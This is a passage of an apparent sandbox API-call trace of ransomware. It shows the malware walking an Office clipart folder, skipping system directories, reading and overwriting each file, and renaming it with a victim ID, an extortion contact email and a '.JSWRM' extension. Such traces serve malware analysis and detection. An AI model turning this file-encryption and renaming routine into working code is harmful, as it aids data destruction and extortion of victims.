lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.463] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x380, lpOverlapped=0x0) returned 1 [0076.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0076.463] CloseHandle (hObject=0x314) returned 1 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0076.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0076.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0076.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01585_.WMF", cAlternateFileName="")) returned 1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2=".") returned 1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="..") returned 1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="...") returned 1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="windows") returned -1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="recovery") returned -1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="perflogs") returned -1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="documents and settings") returned -1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="system volume information") returned -1 [0076.464] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="msocache") returned -1 [0076.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0076.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01585_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01585_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01585_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0076.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01585_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01585_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01585_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2524) returned 1 [0076.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d0) returned 0x22fd48 [0076.465] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0076.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.560] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0076.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.560] CloseHandle (hObject=0x314) returned 1 [0076.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x232788 [0076.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0076.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0076.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0076.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0076.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0076.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0076.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232788 | out: hHeap=0x1e0000) returned 1 [0076.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x914, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01586_.WMF", cAlternateFileName="")) returned 1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2=".") returned 1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="..") returned 1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="...") returned 1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="windows") returned -1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="recovery") returned -1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="perflogs") returned -1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="documents and settings") returned -1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="system volume information") returned -1 [0076.562] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="msocache") returned -1 [0076.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0076.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01586_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01586_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01586_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0076.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01586_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01586_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01586_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2324) returned 1 [0076.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x910) returned 0x22fd48 [0076.563] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x910, lpOverlapped=0x0) returned 1 [0076.566] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.566] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x910, lpOverlapped=0x0) returned 1 [0076.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.566] CloseHandle (hObject=0x314) returned 1 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x232788 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0076.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.567] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01586_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01586_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232788 | out: hHeap=0x1e0000) returned 1 [0076.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.568] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01628_.WMF", cAlternateFileName="")) returned 1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2=".") returned 1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="..") returned 1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="...") returned 1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="windows") returned -1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="recovery") returned -1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="perflogs") returned -1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="documents and settings") returned -1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="system volume information") returned -1 [0076.568] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="msocache") returned -1 [0076.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01628_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01628_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01628_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0076.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01628_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01628_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01628_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0076.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.569] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19068) returned 1 [0076.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a70) returned 0x24d210 [0076.569] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4a70, lpOverlapped=0x0) returned 1 [0076.573] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.573] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4a70, lpOverlapped=0x0) returned 1 [0076.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.573] CloseHandle (hObject=0x314) returned 1 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0076.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0076.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0076.574] 